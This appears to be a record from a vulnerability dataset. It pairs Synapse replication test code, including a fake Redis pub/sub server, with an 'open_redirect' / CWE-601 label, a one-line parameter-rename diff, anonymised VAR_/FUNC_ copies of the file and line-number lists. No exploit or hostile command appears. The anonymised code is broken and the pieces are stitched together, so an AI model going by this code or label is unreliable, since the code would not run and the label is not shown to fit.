except Exception:
pass
self.stopProducing()
class FakeRedisPubSubServer:
"""A fake Redis server for pub/sub.
"""
def __init__(self):
self._subscribers = set()
def add_subscriber(self, conn):
"""A connection has called SUBSCRIBE
"""
self._subscribers.add(conn)
def remove_subscriber(self, conn):
"""A connection has called UNSUBSCRIBE
"""
self._subscribers.discard(conn)
def publish(self, conn, channel, msg) -> int:
"""A connection want to publish a message to subscribers.
"""
for sub in self._subscribers:
sub.send(["message", channel, msg])
return len(self._subscribers)
def buildProtocol(self, addr):
return FakeRedisPubSubProtocol(self)
class FakeRedisPubSubProtocol(Protocol):
"""A connection from a client talking to the fake Redis server.
"""
def __init__(self, server: FakeRedisPubSubServer):
self._server = server
self._reader = hiredis.Reader()
def dataReceived(self, data):
self._reader.feed(data)
# We might get multiple messages in one packet.
while True:
msg = self._reader.gets()
if msg is False:
# No more messages.
return
if not isinstance(msg, list):
# Inbound commands should always be a list
raise Exception("Expected redis list")
self.handle_command(msg[0], *msg[1:])
def handle_command(self, command, *args):
"""Received a Redis command from the client.
"""
# We currently only support pub/sub.
if command == b"PUBLISH":
channel, message = args
num_subscribers = self._server.publish(self, channel, message)
self.send(num_subscribers)
elif command == b"SUBSCRIBE":
(channel,) = args
self._server.add_subscriber(self)
self.send(["subscribe", channel, 1])
else:
raise Exception("Unknown command")
def send(self, msg):
"""Send a message back to the client.
"""
raw = self.encode(msg).encode("utf-8")
self.transport.write(raw)
self.transport.flush()
def encode(self, obj):
"""Encode an object to its Redis format.
Supports: strings/bytes, integers and list/tuples.
"""
if isinstance(obj, bytes):
# We assume bytes are just unicode strings.
obj = obj.decode("utf-8")
if isinstance(obj, str):
return "${len}\r\n{str}\r\n".format(len=len(obj), str=obj)
if isinstance(obj, int):
return ":{val}\r\n".format(val=obj)
if isinstance(obj, (list, tuple)):
items = "".join(self.encode(a) for a in obj)
return "*{len}\r\n{items}".format(len=len(obj), items=items)
raise Exception("Unrecognized type for encoding redis: %r: %r", type(obj), obj)
def connectionLost(self, reason):
self._server.remove_subscriber(self)
| open_redirect | {
"code": [
" http_client=None,"
],
"line_no": [
70
]
} | {
"code": [
" federation_http_client=None,"
],
"line_no": [
70
]
} |
import logging
from typing import Any, Callable, List, Optional, Tuple
import attr
from twisted.internet.interfaces import IConsumer, IPullProducer, IReactorTime
from twisted.internet.protocol import Protocol
from twisted.internet.task import LoopingCall
from twisted.web.http import HTTPChannel
from synapse.app.generic_worker import (
GenericWorkerReplicationHandler,
GenericWorkerServer,
)
from synapse.http.server import JsonResource
from synapse.http.site import SynapseRequest, SynapseSite
from synapse.replication.http import ReplicationRestResource, streams
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.protocol import ClientReplicationStreamProtocol
from synapse.replication.tcp.resource import ReplicationStreamProtocolFactory
from synapse.server import HomeServer
from synapse.util import Clock
from tests import unittest
from tests.server import FakeTransport
try:
import .hiredis
except ImportError:
VAR_28 = None
VAR_0 = logging.getLogger(__name__)
class CLASS_0(unittest.HomeserverTestCase):
if not VAR_28:
VAR_29 = "Requires hiredis"
VAR_1 = [
streams.register_servlets,
]
def FUNC_0(self, VAR_2, VAR_3, VAR_4):
VAR_30 = ReplicationStreamProtocolFactory(VAR_4)
self.streamer = VAR_4.get_replication_streamer()
self.server = VAR_30.buildProtocol(None)
self.reactor.lookups["testserv"] = "1.2.3.4"
self.worker_hs = self.setup_test_homeserver(
http_client=None,
homeserver_to_use=GenericWorkerServer,
VAR_32=self._get_worker_hs_config(),
VAR_2=self.reactor,
)
self.worker_hs.get_datastore().db_pool = VAR_4.get_datastore().db_pool
self.test_handler = self._build_replication_data_handler()
self.worker_hs._replication_data_handler = self.test_handler
VAR_31 = ReplicationCommandHandler(self.worker_hs)
self.client = ClientReplicationStreamProtocol(
self.worker_hs, "client", "test", VAR_3, VAR_31,
)
self._client_transport = None
self._server_transport = None
def FUNC_1(self) -> dict:
VAR_32 = self.default_config()
VAR_32["worker_app"] = "synapse.app.generic_worker"
VAR_32["worker_replication_host"] = "testserv"
VAR_32["worker_replication_http_port"] = "8765"
return VAR_32
def FUNC_2(self):
return CLASS_2(self.worker_hs)
def FUNC_3(self):
if self._client_transport:
self.client.close()
if self._server_transport:
self.server.close()
self._client_transport = FakeTransport(self.server, self.reactor)
self.client.makeConnection(self._client_transport)
self._server_transport = FakeTransport(self.client, self.reactor)
self.server.makeConnection(self._server_transport)
def FUNC_4(self):
if self._client_transport:
self._client_transport = None
self.client.close()
if self._server_transport:
self._server_transport = None
self.server.close()
def FUNC_5(self):
self.streamer.on_notifier_poke()
self.pump(0.1)
def FUNC_6(self) -> SynapseRequest:
VAR_33 = self.reactor.tcpClients
self.assertEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop(0)
self.assertEqual(VAR_34, "1.2.3.4")
self.assertEqual(VAR_35, 8765)
VAR_39 = VAR_36.buildProtocol(None)
VAR_40 = CLASS_3()
VAR_20 = CLASS_4(self.reactor)
VAR_20.requestFactory = VAR_40
VAR_20.site = self.site
VAR_41 = FakeTransport(
VAR_20, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_20
)
VAR_20.makeConnection(VAR_42)
self.reactor.advance(0)
VAR_42.loseConnection()
VAR_41.loseConnection()
return VAR_40.request
def FUNC_7(
self, VAR_5: SynapseRequest, VAR_6: str
):
self.assertRegex(
VAR_5.path,
br"^/_synapse/replication/get_repl_stream_updates/%s/[^/]+$"
% (VAR_6.encode("ascii"),),
)
self.assertEqual(VAR_5.method, b"GET")
class CLASS_1(unittest.HomeserverTestCase):
VAR_1 = [] # type: List[Callable[[HomeServer, JsonResource], None]]
def FUNC_8(self):
super().setUp()
self.server_factory = ReplicationStreamProtocolFactory(self.hs)
self.streamer = self.hs.get_replication_streamer()
self._redis_server = CLASS_6()
VAR_43 = self.hs.get_datastore()
self.database_pool = VAR_43.db_pool
self.reactor.lookups["testserv"] = "1.2.3.4"
self.reactor.lookups["localhost"] = "127.0.0.1"
self._hs_to_site = {self.hs: self.site}
if self.hs.config.redis.redis_enabled:
self.reactor.add_tcp_client_callback(
"localhost", 6379, self.connect_any_redis_attempts,
)
self.hs.get_tcp_replication().start_replication(self.hs)
self.reactor.add_tcp_client_callback(
"1.2.3.4",
8765,
lambda: self._handle_http_replication_attempt(self.hs, 8765),
)
def FUNC_9(self):
VAR_44 = ReplicationRestResource(self.hs)
for servlet in self.servlets:
servlet(self.hs, VAR_44)
return VAR_44
def FUNC_10(
self, VAR_7: str, VAR_8: dict = {}, **VAR_9
) -> HomeServer:
VAR_32 = self._get_worker_hs_config()
VAR_32["worker_app"] = VAR_7
VAR_32.update(VAR_8)
VAR_45 = self.setup_test_homeserver(
homeserver_to_use=GenericWorkerServer,
VAR_32=config,
VAR_2=self.reactor,
**VAR_9,
)
VAR_11 = VAR_45.get_instance_name()
VAR_46 = VAR_45.config.worker.instance_map.get(VAR_11)
if VAR_46:
if VAR_46.host not in self.reactor.lookups:
raise Exception(
"Host does not have an IP for instance_map[%r].host = %r"
% (VAR_11, VAR_46.host,)
)
self.reactor.add_tcp_client_callback(
self.reactor.lookups[VAR_46.host],
VAR_46.port,
lambda: self._handle_http_replication_attempt(
VAR_45, VAR_46.port
),
)
VAR_43 = VAR_45.get_datastore()
VAR_43.db_pool._db_pool = self.database_pool._db_pool
if not VAR_45.config.redis_enabled:
VAR_31 = ReplicationCommandHandler(VAR_45)
VAR_49 = ClientReplicationStreamProtocol(
VAR_45, "client", "test", self.clock, VAR_31,
)
VAR_23 = self.server_factory.buildProtocol(None)
VAR_50 = FakeTransport(VAR_23, self.reactor)
VAR_49.makeConnection(VAR_50)
VAR_51 = FakeTransport(VAR_49, self.reactor)
VAR_23.makeConnection(VAR_51)
VAR_44 = ReplicationRestResource(VAR_45)
for servlet in self.servlets:
servlet(VAR_45, VAR_44)
self._hs_to_site[VAR_45] = SynapseSite(
logger_name="synapse.access.http.fake",
site_tag="{}-{}".format(
VAR_45.config.server.server_name, VAR_45.get_instance_name()
),
VAR_32=VAR_45.config.server.listeners[0],
VAR_44=resource,
server_version_string="1",
)
if VAR_45.config.redis.redis_enabled:
VAR_45.get_tcp_replication().start_replication(VAR_45)
return VAR_45
def FUNC_1(self) -> dict:
VAR_32 = self.default_config()
VAR_32["worker_replication_host"] = "testserv"
VAR_32["worker_replication_http_port"] = "8765"
return VAR_32
def FUNC_5(self):
self.streamer.on_notifier_poke()
self.pump()
def FUNC_11(self, VAR_4, VAR_10):
VAR_33 = self.reactor.tcpClients
self.assertGreaterEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop()
self.assertEqual(VAR_34, "1.2.3.4")
self.assertEqual(VAR_35, VAR_10)
VAR_39 = VAR_36.buildProtocol(None)
VAR_40 = CLASS_3()
VAR_20 = CLASS_4(self.reactor)
VAR_20.requestFactory = VAR_40
VAR_20.site = self._hs_to_site[VAR_4]
VAR_41 = FakeTransport(
VAR_20, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_20
)
VAR_20.makeConnection(VAR_42)
def FUNC_12(self):
VAR_33 = self.reactor.tcpClients
self.assertEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop(0)
self.assertEqual(VAR_34, "localhost")
self.assertEqual(VAR_35, 6379)
VAR_39 = VAR_36.buildProtocol(None)
VAR_47 = self._redis_server.buildProtocol(None)
VAR_41 = FakeTransport(
VAR_47, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_47
)
server_protocol.makeConnection(VAR_42)
return VAR_41, VAR_42
class CLASS_2(GenericWorkerReplicationHandler):
def __init__(self, VAR_4: HomeServer):
super().__init__(VAR_4)
self.received_rdata_rows = [] # type: List[Tuple[str, int, Any]]
async def FUNC_13(self, VAR_6, VAR_11, VAR_12, VAR_13):
await super().on_rdata(VAR_6, VAR_11, VAR_12, VAR_13)
for r in VAR_13:
self.received_rdata_rows.append((VAR_6, VAR_12, r))
@attr.s()
class CLASS_3:
VAR_5 = attr.ib(default=None)
def __call__(self, *VAR_14, **VAR_9):
assert self.request is None
self.request = SynapseRequest(*VAR_14, **VAR_9)
return self.request
class CLASS_4(HTTPChannel):
def __init__(self, VAR_2: IReactorTime):
super().__init__()
self.reactor = VAR_2
self._pull_to_push_producer = None # type: Optional[CLASS_5]
def FUNC_14(self, VAR_15, VAR_16):
if not VAR_16:
self._pull_to_push_producer = CLASS_5(
self.reactor, VAR_15, self
)
VAR_15 = self._pull_to_push_producer
super().registerProducer(VAR_15, True)
def FUNC_15(self):
if self._pull_to_push_producer:
self._pull_to_push_producer.stop()
def FUNC_16(self, VAR_5, VAR_17):
VAR_5.responseHeaders.setRawHeaders(b"connection", [b"close"])
return False
class CLASS_5:
def __init__(
self, VAR_2: IReactorTime, VAR_15: IPullProducer, VAR_18: IConsumer
):
self._clock = Clock(VAR_2)
self._producer = VAR_15
self._consumer = VAR_18
self._looping_call = None # type: Optional[LoopingCall]
self._start_loop()
def FUNC_17(self):
if not self._looping_call:
self._looping_call = self._clock.looping_call(self._run_once, 0)
def FUNC_18(self):
if self._looping_call:
self._looping_call.stop()
self._looping_call = None
def FUNC_19(self):
self.stop()
def FUNC_20(self):
self._start_loop()
def FUNC_21(self):
self.stop()
self._producer.stopProducing()
def FUNC_22(self):
try:
self._producer.resumeProducing()
except Exception:
VAR_0.exception("Failed to call resumeProducing")
try:
self._consumer.unregisterProducer()
except Exception:
pass
self.stopProducing()
class CLASS_6:
def __init__(self):
self._subscribers = set()
def FUNC_23(self, VAR_19):
self._subscribers.add(VAR_19)
def FUNC_24(self, VAR_19):
self._subscribers.discard(VAR_19)
def FUNC_25(self, VAR_19, VAR_20, VAR_21) -> int:
for sub in self._subscribers:
sub.send(["message", VAR_20, VAR_21])
return len(self._subscribers)
def FUNC_26(self, VAR_22):
return CLASS_7(self)
class CLASS_7(Protocol):
def __init__(self, VAR_23: CLASS_6):
self._server = VAR_23
self._reader = VAR_28.Reader()
def FUNC_27(self, VAR_24):
self._reader.feed(VAR_24)
while True:
VAR_21 = self._reader.gets()
if VAR_21 is False:
return
if not isinstance(VAR_21, list):
raise Exception("Expected redis list")
self.handle_command(VAR_21[0], *VAR_21[1:])
def FUNC_28(self, VAR_25, *VAR_14):
if VAR_25 == b"PUBLISH":
VAR_20, VAR_52 = VAR_14
VAR_53 = self._server.publish(self, VAR_20, VAR_52)
self.send(VAR_53)
elif VAR_25 == b"SUBSCRIBE":
(VAR_20,) = VAR_14
self._server.add_subscriber(self)
self.send(["subscribe", VAR_20, 1])
else:
raise Exception("Unknown command")
def FUNC_29(self, VAR_21):
VAR_48 = self.encode(VAR_21).encode("utf-8")
self.transport.write(VAR_48)
self.transport.flush()
def FUNC_30(self, VAR_26):
if isinstance(VAR_26, bytes):
VAR_26 = obj.decode("utf-8")
if isinstance(VAR_26, str):
return "${len}\r\n{str}\r\n".format(len=len(VAR_26), str=VAR_26)
if isinstance(VAR_26, int):
return ":{val}\r\n".format(val=VAR_26)
if isinstance(VAR_26, (list, tuple)):
VAR_54 = "".join(self.encode(a) for a in VAR_26)
return "*{len}\r\n{VAR_54}".format(len=len(VAR_26), VAR_54=items)
raise Exception("Unrecognized type for encoding redis: %r: %r", type(VAR_26), obj)
def FUNC_31(self, VAR_27):
self._server.remove_subscriber(self)
|
import logging
from typing import Any, Callable, List, Optional, Tuple
import attr
from twisted.internet.interfaces import IConsumer, IPullProducer, IReactorTime
from twisted.internet.protocol import Protocol
from twisted.internet.task import LoopingCall
from twisted.web.http import HTTPChannel
from synapse.app.generic_worker import (
GenericWorkerReplicationHandler,
GenericWorkerServer,
)
from synapse.http.server import JsonResource
from synapse.http.site import SynapseRequest, SynapseSite
from synapse.replication.http import ReplicationRestResource, streams
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.protocol import ClientReplicationStreamProtocol
from synapse.replication.tcp.resource import ReplicationStreamProtocolFactory
from synapse.server import HomeServer
from synapse.util import Clock
from tests import unittest
from tests.server import FakeTransport
try:
import .hiredis
except ImportError:
VAR_28 = None
VAR_0 = logging.getLogger(__name__)
class CLASS_0(unittest.HomeserverTestCase):
if not VAR_28:
VAR_29 = "Requires hiredis"
VAR_1 = [
streams.register_servlets,
]
def FUNC_0(self, VAR_2, VAR_3, VAR_4):
VAR_30 = ReplicationStreamProtocolFactory(VAR_4)
self.streamer = VAR_4.get_replication_streamer()
self.server = VAR_30.buildProtocol(None)
self.reactor.lookups["testserv"] = "1.2.3.4"
self.worker_hs = self.setup_test_homeserver(
federation_http_client=None,
homeserver_to_use=GenericWorkerServer,
VAR_32=self._get_worker_hs_config(),
VAR_2=self.reactor,
)
self.worker_hs.get_datastore().db_pool = VAR_4.get_datastore().db_pool
self.test_handler = self._build_replication_data_handler()
self.worker_hs._replication_data_handler = self.test_handler
VAR_31 = ReplicationCommandHandler(self.worker_hs)
self.client = ClientReplicationStreamProtocol(
self.worker_hs, "client", "test", VAR_3, VAR_31,
)
self._client_transport = None
self._server_transport = None
def FUNC_1(self) -> dict:
VAR_32 = self.default_config()
VAR_32["worker_app"] = "synapse.app.generic_worker"
VAR_32["worker_replication_host"] = "testserv"
VAR_32["worker_replication_http_port"] = "8765"
return VAR_32
def FUNC_2(self):
return CLASS_2(self.worker_hs)
def FUNC_3(self):
if self._client_transport:
self.client.close()
if self._server_transport:
self.server.close()
self._client_transport = FakeTransport(self.server, self.reactor)
self.client.makeConnection(self._client_transport)
self._server_transport = FakeTransport(self.client, self.reactor)
self.server.makeConnection(self._server_transport)
def FUNC_4(self):
if self._client_transport:
self._client_transport = None
self.client.close()
if self._server_transport:
self._server_transport = None
self.server.close()
def FUNC_5(self):
self.streamer.on_notifier_poke()
self.pump(0.1)
def FUNC_6(self) -> SynapseRequest:
VAR_33 = self.reactor.tcpClients
self.assertEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop(0)
self.assertEqual(VAR_34, "1.2.3.4")
self.assertEqual(VAR_35, 8765)
VAR_39 = VAR_36.buildProtocol(None)
VAR_40 = CLASS_3()
VAR_20 = CLASS_4(self.reactor)
VAR_20.requestFactory = VAR_40
VAR_20.site = self.site
VAR_41 = FakeTransport(
VAR_20, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_20
)
VAR_20.makeConnection(VAR_42)
self.reactor.advance(0)
VAR_42.loseConnection()
VAR_41.loseConnection()
return VAR_40.request
def FUNC_7(
self, VAR_5: SynapseRequest, VAR_6: str
):
self.assertRegex(
VAR_5.path,
br"^/_synapse/replication/get_repl_stream_updates/%s/[^/]+$"
% (VAR_6.encode("ascii"),),
)
self.assertEqual(VAR_5.method, b"GET")
class CLASS_1(unittest.HomeserverTestCase):
VAR_1 = [] # type: List[Callable[[HomeServer, JsonResource], None]]
def FUNC_8(self):
super().setUp()
self.server_factory = ReplicationStreamProtocolFactory(self.hs)
self.streamer = self.hs.get_replication_streamer()
self._redis_server = CLASS_6()
VAR_43 = self.hs.get_datastore()
self.database_pool = VAR_43.db_pool
self.reactor.lookups["testserv"] = "1.2.3.4"
self.reactor.lookups["localhost"] = "127.0.0.1"
self._hs_to_site = {self.hs: self.site}
if self.hs.config.redis.redis_enabled:
self.reactor.add_tcp_client_callback(
"localhost", 6379, self.connect_any_redis_attempts,
)
self.hs.get_tcp_replication().start_replication(self.hs)
self.reactor.add_tcp_client_callback(
"1.2.3.4",
8765,
lambda: self._handle_http_replication_attempt(self.hs, 8765),
)
def FUNC_9(self):
VAR_44 = ReplicationRestResource(self.hs)
for servlet in self.servlets:
servlet(self.hs, VAR_44)
return VAR_44
def FUNC_10(
self, VAR_7: str, VAR_8: dict = {}, **VAR_9
) -> HomeServer:
VAR_32 = self._get_worker_hs_config()
VAR_32["worker_app"] = VAR_7
VAR_32.update(VAR_8)
VAR_45 = self.setup_test_homeserver(
homeserver_to_use=GenericWorkerServer,
VAR_32=config,
VAR_2=self.reactor,
**VAR_9,
)
VAR_11 = VAR_45.get_instance_name()
VAR_46 = VAR_45.config.worker.instance_map.get(VAR_11)
if VAR_46:
if VAR_46.host not in self.reactor.lookups:
raise Exception(
"Host does not have an IP for instance_map[%r].host = %r"
% (VAR_11, VAR_46.host,)
)
self.reactor.add_tcp_client_callback(
self.reactor.lookups[VAR_46.host],
VAR_46.port,
lambda: self._handle_http_replication_attempt(
VAR_45, VAR_46.port
),
)
VAR_43 = VAR_45.get_datastore()
VAR_43.db_pool._db_pool = self.database_pool._db_pool
if not VAR_45.config.redis_enabled:
VAR_31 = ReplicationCommandHandler(VAR_45)
VAR_49 = ClientReplicationStreamProtocol(
VAR_45, "client", "test", self.clock, VAR_31,
)
VAR_23 = self.server_factory.buildProtocol(None)
VAR_50 = FakeTransport(VAR_23, self.reactor)
VAR_49.makeConnection(VAR_50)
VAR_51 = FakeTransport(VAR_49, self.reactor)
VAR_23.makeConnection(VAR_51)
VAR_44 = ReplicationRestResource(VAR_45)
for servlet in self.servlets:
servlet(VAR_45, VAR_44)
self._hs_to_site[VAR_45] = SynapseSite(
logger_name="synapse.access.http.fake",
site_tag="{}-{}".format(
VAR_45.config.server.server_name, VAR_45.get_instance_name()
),
VAR_32=VAR_45.config.server.listeners[0],
VAR_44=resource,
server_version_string="1",
)
if VAR_45.config.redis.redis_enabled:
VAR_45.get_tcp_replication().start_replication(VAR_45)
return VAR_45
def FUNC_1(self) -> dict:
VAR_32 = self.default_config()
VAR_32["worker_replication_host"] = "testserv"
VAR_32["worker_replication_http_port"] = "8765"
return VAR_32
def FUNC_5(self):
self.streamer.on_notifier_poke()
self.pump()
def FUNC_11(self, VAR_4, VAR_10):
VAR_33 = self.reactor.tcpClients
self.assertGreaterEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop()
self.assertEqual(VAR_34, "1.2.3.4")
self.assertEqual(VAR_35, VAR_10)
VAR_39 = VAR_36.buildProtocol(None)
VAR_40 = CLASS_3()
VAR_20 = CLASS_4(self.reactor)
VAR_20.requestFactory = VAR_40
VAR_20.site = self._hs_to_site[VAR_4]
VAR_41 = FakeTransport(
VAR_20, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_20
)
VAR_20.makeConnection(VAR_42)
def FUNC_12(self):
VAR_33 = self.reactor.tcpClients
self.assertEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop(0)
self.assertEqual(VAR_34, "localhost")
self.assertEqual(VAR_35, 6379)
VAR_39 = VAR_36.buildProtocol(None)
VAR_47 = self._redis_server.buildProtocol(None)
VAR_41 = FakeTransport(
VAR_47, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_47
)
server_protocol.makeConnection(VAR_42)
return VAR_41, VAR_42
class CLASS_2(GenericWorkerReplicationHandler):
def __init__(self, VAR_4: HomeServer):
super().__init__(VAR_4)
self.received_rdata_rows = [] # type: List[Tuple[str, int, Any]]
async def FUNC_13(self, VAR_6, VAR_11, VAR_12, VAR_13):
await super().on_rdata(VAR_6, VAR_11, VAR_12, VAR_13)
for r in VAR_13:
self.received_rdata_rows.append((VAR_6, VAR_12, r))
@attr.s()
class CLASS_3:
VAR_5 = attr.ib(default=None)
def __call__(self, *VAR_14, **VAR_9):
assert self.request is None
self.request = SynapseRequest(*VAR_14, **VAR_9)
return self.request
class CLASS_4(HTTPChannel):
def __init__(self, VAR_2: IReactorTime):
super().__init__()
self.reactor = VAR_2
self._pull_to_push_producer = None # type: Optional[CLASS_5]
def FUNC_14(self, VAR_15, VAR_16):
if not VAR_16:
self._pull_to_push_producer = CLASS_5(
self.reactor, VAR_15, self
)
VAR_15 = self._pull_to_push_producer
super().registerProducer(VAR_15, True)
def FUNC_15(self):
if self._pull_to_push_producer:
self._pull_to_push_producer.stop()
def FUNC_16(self, VAR_5, VAR_17):
VAR_5.responseHeaders.setRawHeaders(b"connection", [b"close"])
return False
class CLASS_5:
def __init__(
self, VAR_2: IReactorTime, VAR_15: IPullProducer, VAR_18: IConsumer
):
self._clock = Clock(VAR_2)
self._producer = VAR_15
self._consumer = VAR_18
self._looping_call = None # type: Optional[LoopingCall]
self._start_loop()
def FUNC_17(self):
if not self._looping_call:
self._looping_call = self._clock.looping_call(self._run_once, 0)
def FUNC_18(self):
if self._looping_call:
self._looping_call.stop()
self._looping_call = None
def FUNC_19(self):
self.stop()
def FUNC_20(self):
self._start_loop()
def FUNC_21(self):
self.stop()
self._producer.stopProducing()
def FUNC_22(self):
try:
self._producer.resumeProducing()
except Exception:
VAR_0.exception("Failed to call resumeProducing")
try:
self._consumer.unregisterProducer()
except Exception:
pass
self.stopProducing()
class CLASS_6:
def __init__(self):
self._subscribers = set()
def FUNC_23(self, VAR_19):
self._subscribers.add(VAR_19)
def FUNC_24(self, VAR_19):
self._subscribers.discard(VAR_19)
def FUNC_25(self, VAR_19, VAR_20, VAR_21) -> int:
for sub in self._subscribers:
sub.send(["message", VAR_20, VAR_21])
return len(self._subscribers)
def FUNC_26(self, VAR_22):
return CLASS_7(self)
class CLASS_7(Protocol):
def __init__(self, VAR_23: CLASS_6):
self._server = VAR_23
self._reader = VAR_28.Reader()
def FUNC_27(self, VAR_24):
self._reader.feed(VAR_24)
while True:
VAR_21 = self._reader.gets()
if VAR_21 is False:
return
if not isinstance(VAR_21, list):
raise Exception("Expected redis list")
self.handle_command(VAR_21[0], *VAR_21[1:])
def FUNC_28(self, VAR_25, *VAR_14):
if VAR_25 == b"PUBLISH":
VAR_20, VAR_52 = VAR_14
VAR_53 = self._server.publish(self, VAR_20, VAR_52)
self.send(VAR_53)
elif VAR_25 == b"SUBSCRIBE":
(VAR_20,) = VAR_14
self._server.add_subscriber(self)
self.send(["subscribe", VAR_20, 1])
else:
raise Exception("Unknown command")
def FUNC_29(self, VAR_21):
VAR_48 = self.encode(VAR_21).encode("utf-8")
self.transport.write(VAR_48)
self.transport.flush()
def FUNC_30(self, VAR_26):
if isinstance(VAR_26, bytes):
VAR_26 = obj.decode("utf-8")
if isinstance(VAR_26, str):
return "${len}\r\n{str}\r\n".format(len=len(VAR_26), str=VAR_26)
if isinstance(VAR_26, int):
return ":{val}\r\n".format(val=VAR_26)
if isinstance(VAR_26, (list, tuple)):
VAR_54 = "".join(self.encode(a) for a in VAR_26)
return "*{len}\r\n{VAR_54}".format(len=len(VAR_26), VAR_54=items)
raise Exception("Unrecognized type for encoding redis: %r: %r", type(VAR_26), obj)
def FUNC_31(self, VAR_27):
self._server.remove_subscriber(self)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
17,
19,
24,
37,
40,
45,
47,
48,
51,
52,
53,
56,
60,
62,
66,
67,
75,
76,
77,
79,
82,
87,
90,
97,
100,
104,
107,
110,
113,
118,
122,
129,
134,
138,
139,
145,
146,
148,
150,
151,
155,
156,
161,
166,
167,
168,
170,
171,
172,
175,
177,
184,
190,
192,
193,
196,
200,
202,
205,
206,
209,
210,
212,
215,
218,
219,
220,
222,
224,
228,
230,
231,
232,
233,
234,
235,
236,
242,
246,
247,
248,
249,
251,
254,
256,
262,
268,
272,
276,
283,
284,
285,
286,
290,
296,
304,
307,
308,
309,
316,
319,
322,
323,
325,
328,
338,
341,
343,
349,
356,
361,
362,
363,
369,
370,
372,
374,
375,
379,
380,
385,
390,
391,
392,
393,
394,
395,
406,
409,
414,
419,
421,
422,
425,
428,
429,
431,
436,
437,
443,
445,
448,
451,
452,
455,
462,
466,
468,
470,
476,
478,
481,
483,
487,
488,
491,
492,
496,
503,
504,
505,
507,
508,
510,
514,
516,
518,
525,
530,
535,
541,
545,
554,
556,
557,
561,
564,
569,
574,
580,
582,
585,
586,
590,
594,
597,
598,
601,
603,
605,
607,
609,
611,
615,
616,
627,
632,
635,
638,
641,
643,
645,
653,
655,
658,
50,
195,
196,
197,
198,
199,
424,
440,
441,
442,
454,
455,
456,
457,
458,
459,
460,
461,
494,
495,
559,
560,
588,
589,
124,
125,
126,
131,
132,
133,
134,
135,
136,
137,
181,
182,
183,
244,
245,
260,
261,
262,
263,
264,
265,
266,
267,
268,
269,
270,
271,
351,
352,
353,
358,
359,
360,
397,
398,
399,
400,
485,
486,
512,
513,
520,
521,
527,
528,
532,
533,
537,
538,
543,
544,
566,
567,
571,
572,
576,
577,
613,
614,
629,
630,
637,
638,
639,
640
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
17,
19,
24,
37,
40,
45,
47,
48,
51,
52,
53,
56,
60,
62,
66,
67,
75,
76,
77,
79,
82,
87,
90,
97,
100,
104,
107,
110,
113,
118,
122,
129,
134,
138,
139,
145,
146,
148,
150,
151,
155,
156,
161,
166,
167,
168,
170,
171,
172,
175,
177,
184,
190,
192,
193,
196,
200,
202,
205,
206,
209,
210,
212,
215,
218,
219,
220,
222,
224,
228,
230,
231,
232,
233,
234,
235,
236,
242,
246,
247,
248,
249,
251,
254,
256,
262,
268,
272,
276,
283,
284,
285,
286,
290,
296,
304,
307,
308,
309,
316,
319,
322,
323,
325,
328,
338,
341,
343,
349,
356,
361,
362,
363,
369,
370,
372,
374,
375,
379,
380,
385,
390,
391,
392,
393,
394,
395,
406,
409,
414,
419,
421,
422,
425,
428,
429,
431,
436,
437,
443,
445,
448,
451,
452,
455,
462,
466,
468,
470,
476,
478,
481,
483,
487,
488,
491,
492,
496,
503,
504,
505,
507,
508,
510,
514,
516,
518,
525,
530,
535,
541,
545,
554,
556,
557,
561,
564,
569,
574,
580,
582,
585,
586,
590,
594,
597,
598,
601,
603,
605,
607,
609,
611,
615,
616,
627,
632,
635,
638,
641,
643,
645,
653,
655,
658,
50,
195,
196,
197,
198,
199,
424,
440,
441,
442,
454,
455,
456,
457,
458,
459,
460,
461,
494,
495,
559,
560,
588,
589,
124,
125,
126,
131,
132,
133,
134,
135,
136,
137,
181,
182,
183,
244,
245,
260,
261,
262,
263,
264,
265,
266,
267,
268,
269,
270,
271,
351,
352,
353,
358,
359,
360,
397,
398,
399,
400,
485,
486,
512,
513,
520,
521,
527,
528,
532,
533,
537,
538,
543,
544,
566,
567,
571,
572,
576,
577,
613,
614,
629,
630,
637,
638,
639,
640
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.app.generic_worker import GenericWorkerServer
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class FrontendProxyTests(HomeserverTestCase):
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
http_client=None, homeserver_to_use=GenericWorkerServer
)
return hs
def default_config(self):
c = super().default_config()
c["worker_app"] = "synapse.app.frontend_proxy"
c["worker_listeners"] = [
{
"type": "http",
"port": 8080,
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": ["client"]}],
}
]
return c
def test_listen_http_with_presence_enabled(self):
"""
